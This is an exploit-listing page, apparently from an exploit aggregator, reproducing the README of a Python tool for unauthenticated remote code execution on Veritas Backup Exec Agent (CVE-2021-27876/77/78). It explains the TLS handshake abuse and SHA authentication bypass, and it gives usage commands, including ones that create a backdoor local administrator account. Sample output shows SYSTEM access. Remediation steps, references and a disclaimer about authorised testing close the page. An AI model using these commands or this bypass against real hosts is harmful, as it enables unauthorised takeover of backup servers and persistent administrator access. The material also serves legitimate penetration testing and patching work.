Exploit for CVE-2021-27876 CVE-2021-27876 CVE-2021-27877 CVE-2021-27878

Name: Exploit for CVE-2021-27876 CVE-2021-27876 CVE-2021-27877 CVE-2021-27878
Rating: 5 (7 reviews)
2026-06-18 | CVSS 9.8
## https://sploitus.com/exploit?id=1AB449BE-C315-5C63-8B4A-EB0F08C31177
# CVE-2021-27876
Unauthenticated RCE exploit for Veritas Backup Exec Agent (CVE-2021-27876/77/78) — SHA auth bypass to SYSTEM via NDMP

## CVEs

  | CVE | Description | CVSS 3.1 |
  |---|---|---|
  | CVE-2021-27876 | Authentication bypass via SHA hash manipulation in the NDMP protocol | 9.8 Critical |
  | CVE-2021-27877 | Unauthenticated arbitrary file read via NDMP | 9.8 Critical |
  | CVE-2021-27878 | Arbitrary OS command execution via `NDMP_EXECUTE_COMMAND` | 9.8 Critical |

  **Advisory:** Veritas VTS21-003

  ## Affected Versions

  - Backup Exec 16.x
  - Backup Exec 20.x
  - Backup Exec 21.x ≤ 21.2 (agent revision ≤ 9.3)

  **Fixed in:** Backup Exec 21.3 and later.

  ---

  ## How It Works

  The Veritas Backup Exec Agent listens on TCP/10000 and speaks the NDMP (Network Data Management Protocol). The exploit chains three weaknesses:

  1. **TLS handshake abuse** — The agent requests a CSR during its custom TLS negotiation. The exploit generates a local CA, signs the agent's CSR, and completes the handshake, upgrading the socket to TLS
  without any pre-shared secret.

  2. **SHA auth bypass (CVE-2021-27876)** — The NDMP SHA authentication computes `SHA256('\x00' * 64 + challenge)`. Because the password is prepended as a 64-byte zero-padded block and no server-side validation
  of the password material occurs, any client can authenticate as `Administrator` without knowing the password.

  3. **NDMP_EXECUTE_COMMAND (CVE-2021-27878)** — Once authenticated, the `NDMP_EXECUTE_COMMAND` message type runs arbitrary OS commands as `NT AUTHORITY\SYSTEM`. Output is redirected to
  `C:\Windows\Temp\_be_out.txt` and read back via `NDMP_FILE_READ`.

  ---

  ## Requirements

  Python 3.8+
  pip install cryptography

  ---

  ## Usage

  python3 be_rce.py  

  **Examples:**

  ```bash
  # Confirm SYSTEM access
  python3 be_rce.py 10.10.10.50 "whoami"

  # Dump hostname and domain
  python3 be_rce.py 10.10.10.50 "whoami /all"

  # Add a local admin
  python3 be_rce.py 10.10.10.50 "net user pwned P@ssw0rd123! /add"
  python3 be_rce.py 10.10.10.50 "net localgroup administrators pwned /add"

  Sample output:

  [*] Connecting to 10.10.10.50:10000
  [*] NDMP version: 9
  [+] NDMP connection opened
  [*] Generating CA certificate
  [*] Got agent CSR (1024 bytes)
  [*] Signed agent CSR and sent back
  [*] SSL_HANDSHAKE CONNECT sent
  [*] Upgrading to TLS
  [+] TLS established
  [*] Requesting SHA challenge
  [*] Got 64-byte SHA challenge
  [+] SHA authentication bypassed!
  [*] Executing: whoami
  [+] Command output:
  ────────────────────────────────────────
  nt authority\system
  ────────────────────────────────────────
````
  ---
  Remediation

  - Upgrade Veritas Backup Exec Agent to 21.3 or later on all hosts
  - Restrict TCP/10000 to authorised backup management hosts via host firewall and network ACLs
  - Audit all hosts running the Backup Exec agent across your environment

  ---
  References

  - https://www.veritas.com/support/en_US/security/VTS21-003
  - https://nvd.nist.gov/vuln/detail/CVE-2021-27876
  - https://nvd.nist.gov/vuln/detail/CVE-2021-27877
  - https://nvd.nist.gov/vuln/detail/CVE-2021-27878
  - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb

  ---
  Legal

  This tool is provided for authorised penetration testing and security research only. Use against systems without explicit written permission is illegal. The author accepts no liability for misuse.
  ```